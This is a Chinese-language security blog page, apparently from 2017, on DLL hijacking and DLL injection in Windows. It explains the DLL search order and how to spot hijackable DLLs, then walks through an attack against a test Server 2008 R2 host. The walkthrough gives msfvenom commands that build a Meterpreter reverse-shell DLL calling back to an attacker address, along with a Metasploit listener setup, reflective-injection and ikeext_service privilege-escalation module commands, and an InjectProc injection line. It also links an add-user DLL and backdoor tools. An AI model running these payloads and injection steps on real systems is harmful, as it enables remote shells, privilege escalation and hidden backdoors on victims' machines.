<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>DLL-Attack - Evi1oX</title>
  <meta name="renderer" content="webkit" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">


<meta name="author" content="Evi1oX" /><meta name="description" content="0x01 DLL劫持漏洞根源 程序在调用DLL时未指明DLL的完整路径 1 2 3 4 `3gstudent`提到的DLL劫持漏洞微软尚未给出直接的修复方法，原" /><meta name="keywords" content="Hugo, theme, even" />






<meta name="generator" content="Hugo 0.54.0 with theme even" />


<link rel="canonical" href="https://04z.net/post/dll-attack/" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/manifest.json">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">


<link href="/dist/even.983f84a7.min.css" rel="stylesheet">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.css" integrity="sha256-7TyXnr2YU040zfSP+rEcz29ggW4j56/ujTPwjMzyqFY=" crossorigin="anonymous">


<meta property="og:title" content="DLL-Attack" />
<meta property="og:description" content="0x01 DLL劫持漏洞根源 程序在调用DLL时未指明DLL的完整路径 1 2 3 4 `3gstudent`提到的DLL劫持漏洞微软尚未给出直接的修复方法，原" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://04z.net/post/dll-attack/" />
<meta property="article:published_time" content="2017-08-03T20:46:44&#43;00:00"/>
<meta property="article:modified_time" content="2017-08-03T20:46:44&#43;00:00"/>

<meta itemprop="name" content="DLL-Attack">
<meta itemprop="description" content="0x01 DLL劫持漏洞根源 程序在调用DLL时未指明DLL的完整路径 1 2 3 4 `3gstudent`提到的DLL劫持漏洞微软尚未给出直接的修复方法，原">


<meta itemprop="datePublished" content="2017-08-03T20:46:44&#43;00:00" />
<meta itemprop="dateModified" content="2017-08-03T20:46:44&#43;00:00" />
<meta itemprop="wordCount" content="1360">



<meta itemprop="keywords" content="" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="DLL-Attack"/>
<meta name="twitter:description" content="0x01 DLL劫持漏洞根源 程序在调用DLL时未指明DLL的完整路径 1 2 3 4 `3gstudent`提到的DLL劫持漏洞微软尚未给出直接的修复方法，原"/>

<!--[if lte IE 9]>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
<![endif]-->

<!--[if lt IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
<![endif]-->

</head>
<body>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/" class="logo">Evi1oX</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>
<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    <a href="/post/friends">
        <li class="mobile-menu-item">Friends</li>
      </a>
  </ul>
</nav>
  <div class="container" id="mobile-panel">
    <header id="header" class="header">
        <div class="logo-wrapper">
  <a href="/" class="logo">Evi1oX</a>
</div>

<nav class="site-navbar">
  <ul id="menu" class="menu">
    <li class="menu-item">
        <a class="menu-item-link" href="/post/friends">Friends</a>
      </li>
  </ul>
</nav>
    </header>

    <main id="main" class="main">
      <div class="content-wrapper">
        <div id="content" class="content">
          <article class="post">
    
    <header class="post-header">
      <h1 class="post-title">DLL-Attack</h1>

      <div class="post-meta">
        
        
        
      </div>
    </header>

    <div class="post-toc" id="post-toc">
  <h2 class="post-toc-title">Contents</h2>
  <div class="post-toc-content">
    <nav id="TableOfContents">
<ul>
<li><a href="#0x01-dll劫持漏洞根源">0x01 DLL劫持漏洞根源</a></li>
<li><a href="#0-02-劫持windows系统的dll">0×02 劫持Windows系统的DLL</a></li>
<li><a href="#0x03-如何编写一个劫持的dll">0x03 如何编写一个劫持的DLL</a>
<ul>
<li><a href="#dll-hijacker-py-https-raw-githubusercontent-com-caledoniaproject-dll-hijacker-rewritten-master-dll-hijacker-py"><a href="https://raw.githubusercontent.com/CaledoniaProject/DLL_Hijacker_Rewritten/master/DLL_Hijacker.py">DLL_Hijacker.py</a></a></li>
<li><a href="#metasploit生成dll并监听">metasploit生成dll并监听</a></li>
<li><a href="#remote-dll-injector-http-securityxploded-com-getsoftware-direct-php-id-7151"><a href="http://securityxploded.com/getsoftware_direct.php?id=7151">remote-dll-injector</a></a></li>
<li><a href="#metasploit注入">Metasploit注入</a></li>
<li><a href="#invoke-dllinjection-https-raw-githubusercontent-com-powershellmafia-powersploit-master-codeexecution-invoke-dllinjection-ps1"><a href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1">Invoke-DllInjection</a></a></li>
<li><a href="#更新-injectproc-https-github-com-secrary-injectproc">更新<a href="https://github.com/secrary/InjectProc">injectProc</a></a></li>
</ul></li>
<li><a href="#0x04-结语">0x04 结语</a></li>
</ul>
</nav>
  </div>
</div>
    <div class="post-content">
      

<h1 id="0x01-dll劫持漏洞根源">0x01 DLL劫持漏洞根源</h1>

<p>程序在调用DLL时未指明DLL的完整路径</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></pre></td>
<td class="lntd">
<pre class="chroma">`3gstudent`提到的DLL劫持漏洞微软尚未给出直接的修复方法，原因可能有以下几点：
        *这是开发者的失误，换用绝对路径就能避免这个问题
        *利用的前提是攻击者已经能够在同级目录放置文件，这代表系统已经被攻破
        *如果直接修复，或许会影响老版本程序，兼容性不好</pre></td></tr></table>
</div>
</div>
<p>当一个应用程序需要加载一个DLL时</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span></pre></td>
<td class="lntd">
<pre class="chroma">加载顺序为
        *应用程序的目录
        *c:\windows\system32
        *c:\windows\system
        *c:\windows
        *当前工作目录
        *系统PATH环境变量
        *用户PATH环境变量</pre></td></tr></table>
</div>
</div>
<p>默认情况下，如果软件安装在<code>C盘根目录</code>而不是<code>c:\Program Files</code>，那经过身份验证的用户具有该目录写入权限。<br />
另外，Perl，Python，Ruby等软件通常都添加到Path变量中。<br />
那攻击者可以在当前目录中编写恶意DLL，只要重新运行exe程序就gg。详细内容见：<a href="https://msdn.microsoft.com/en-us/library/ms682586.aspx">microsoft</a></p>

<h1 id="0-02-劫持windows系统的dll">0×02 劫持Windows系统的DLL</h1>

<p>要分析一个应用程序是否存在劫持系统DLL的漏洞，需要这么几个步骤：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></pre></td>
<td class="lntd">
<pre class="chroma">*启动应用程序
*使用Process Explorer等类似软件查看该应用程序启动后加载的动态链接库。
*从该应用程序已经加载的DLL列表中，查找在上述`KnownDLLs注册表项`中不存在的DLL。
*编写第三步中获取到的DLL的劫持DLL。
*将编写好的劫持DLL放到该应用程序目录下，重新启动该应用程序，检测是否劫持成功。</pre></td></tr></table>
</div>
</div>
<h1 id="0x03-如何编写一个劫持的dll">0x03 如何编写一个劫持的DLL</h1>

<blockquote>
<p>测试靶机：Server 2008 R2<br />
攻击主机：Mac + Metasploit</p>
</blockquote>

<h2 id="dll-hijacker-py-https-raw-githubusercontent-com-caledoniaproject-dll-hijacker-rewritten-master-dll-hijacker-py"><a href="https://raw.githubusercontent.com/CaledoniaProject/DLL_Hijacker_Rewritten/master/DLL_Hijacker.py">DLL_Hijacker.py</a></h2>

<blockquote>
<p>1.查看被劫持的DLL的导出函数表。<br />
2.编程实现劫持DLL向原DLL的导出函数的转发，并加入你的<code>恶意代码</code>。</p>
</blockquote>

<p>使用DLL_Hijacker.py脚本可以一键生成劫持指定DLL的CPP源码文件。<br />
对这个CPP文件进行编译就生成了相应的劫持DLL文件。</p>

<h2 id="metasploit生成dll并监听">metasploit生成dll并监听</h2>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></pre></td>
<td class="lntd">
<pre class="chroma">msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=101.101.101.100 lport=2222 -f dll &gt; attack.dll
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 10.10.10.2
    set lport 4444
    run</pre></td></tr></table>
</div>
</div>
<h2 id="remote-dll-injector-http-securityxploded-com-getsoftware-direct-php-id-7151"><a href="http://securityxploded.com/getsoftware_direct.php?id=7151">remote-dll-injector</a></h2>

<p>据说采取了CreateRemoteThread的技术，支持dll注入的工具，提供pid和dll路径就行，测试失败<br />
<img src="https://img.04z.net/img/RemoteDLLInjector.png" alt="图片已损坏" /></p>

<h2 id="metasploit注入">Metasploit注入</h2>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></pre></td>
<td class="lntd">
<pre class="chroma">方法一
    use post/windows/manage/reflective_dll_inject
    set path 攻击主机的dll路径
    set pid  xxxx
    set session x
    exploit</pre></td></tr></table>
</div>
</div>
<p><img src="https://img.04z.net/img/reflective.png" alt="图片已损坏" title="reflective_dll_inject" /></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></pre></td>
<td class="lntd">
<pre class="chroma">方法二
    use exploit/windows/local/ikeext_service
    set dir C:\\windows\\
    set session x
    run</pre></td></tr></table>
</div>
</div>
<p><img src="https://img.04z.net/img/ikeext_service.png" alt="图片已损坏" title="ikeext_service" /></p>

<h2 id="invoke-dllinjection-https-raw-githubusercontent-com-powershellmafia-powersploit-master-codeexecution-invoke-dllinjection-ps1"><a href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1">Invoke-DllInjection</a></h2>

<p><img src="https://img.04z.net/img/powersploitxx.png" alt="图片已损坏" title="Invoke-DllInjection" /></p>

<p>可能是我的方法不对，第一二两种皆失败，powersploit和ikeext_service成功。有知道的朋友麻烦联系下qq。在此多谢</p>

<h2 id="更新-injectproc-https-github-com-secrary-injectproc">更新<a href="https://github.com/secrary/InjectProc">injectProc</a></h2>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span></pre></td>
<td class="lntd">
<pre class="chroma">InjectProc.exe dll_inj path/to/dll.dll notepad.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.2222 LPORT=4444 -f dll -o xxxx.dll</pre></td></tr></table>
</div>
</div>
<p><a href="https://www.youtube.com/watch?v=hLPDq9nSHMw">https://www.youtube.com/watch?v=hLPDq9nSHMw</a></p>

<hr />

<h1 id="0x04-结语">0x04 结语</h1>

<p>为了能够通过DLL劫持升级特权，需要满足以下条件：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></pre></td>
<td class="lntd">
<pre class="chroma">*在系统文件夹上写入权限
*软件安装在非默认目录下
*作为系统运行并缺少DLL的服务
*重新启动服务</pre></td></tr></table>
</div>
</div>
<p>另外，在挖掘此类漏洞时也要注意到不存在劫持漏洞的DLL如果调用了一个或多个其他DLL，那么依旧有可能会产生DLL劫持漏洞。如果宿主进程已经取得了UAC权限，那么DLL劫持也是另外一种获取UAC权限的方式，同时，由于DLL劫持漏洞的隐蔽性，安全软件难以捕捉检测，很多恶意软件使用此漏洞作为后门的通道或者自启动技术。后续将更新lnk-dll劫持。敬请期待</p>

<p>最后附上lostwolf表哥的添加用户的<a href="https://img.04z.net/img/adduserdll.c">dll</a></p>

<hr />

<p><a href="https://github.com/Yonsm/AheadLib">AheadLib</a> 自动生成一个特洛伊DLL分析代码的工具</p>

<p><a href="https://github.com/stephenfewer/ReflectiveDLLInjection">https://github.com/stephenfewer/ReflectiveDLLInjection</a></p>

<p><a href="https://github.com/secretsquirrel/the-backdoor-factory">https://github.com/secretsquirrel/the-backdoor-factory</a></p>

<p><a href="https://github.com/secrary/InjectProc/issues">https://github.com/secrary/InjectProc/issues</a></p>

<p><a href="https://www.nettitude.co.uk/dll-injection-part-one/">https://www.nettitude.co.uk/dll-injection-part-one/</a></p>

<p><a href="https://www.nettitude.co.uk/dll-injection-part-two/">https://www.nettitude.co.uk/dll-injection-part-two/</a></p>

<p><a href="http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html">http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html</a></p>

<p><a href="http://www.programlife.net/a-deep-insight-into-dll-hijacking-vulnerability.html">深入解析DLL劫持漏洞</a></p>

<p><a href="https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95/">DLL劫持漏洞自动化识别工具Rattler测试</a></p>

<p><a href="http://www.qingpingshan.com/pc/aq/158420.html">DLL攻击一次实战</a></p>

<p><a href="https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html">反射型DLL注射技术</a></p>

    </div>

    
<footer class="post-footer">
      
      <nav class="post-nav">
        <a class="prev" href="/post/udf-attack/">
            <i class="iconfont icon-left"></i>
            <span class="prev-text nav-default">UDF-AttacK</span>
            <span class="prev-text nav-mobile">Prev</span>
          </a>
        <a class="next" href="/post/upload-attack/">
            <span class="next-text nav-default">Upload-AttacK</span>
            <span class="next-text nav-mobile">Next</span>
            <i class="iconfont icon-right"></i>
          </a>
      </nav>
    </footer>
  </article>
        </div>
        

  

  

      </div>
    </main>

    <footer id="footer" class="footer">
      
    </footer>

    <div class="back-to-top" id="back-to-top">
      <i class="iconfont icon-up"></i>
    </div>
  </div>
  
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/slideout@1.0.1/dist/slideout.min.js" integrity="sha256-t+zJ/g8/KXIJMjSVQdnibt4dlaDxc9zXr/9oNPeWqdg=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.js" integrity="sha256-XVLffZaxoWfGUEbdzuLi7pwaUJv1cecsQJQqGLe7axY=" crossorigin="anonymous"></script>
<script type="text/javascript" src="/dist/even.ae3e3272.min.js"></script>
  <script type="text/javascript">
    window.MathJax = {
      tex2jax: {inlineMath: [['$','$'], ['\\(','\\)']]},
      showProcessingMessages: false,
      messageStyle: 'none'
    };
  </script>
  <script async src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/MathJax.js?config=TeX-MML-AM_CHTML"  integrity="sha256-nvJJv9wWKEm88qvoQl9ekL2J+k/RWIsaSScxxlsrv8k=" crossorigin="anonymous"></script>


<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-153178075-1', 'auto');
	ga('set', 'anonymizeIp', true);
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>







</body>
</html>
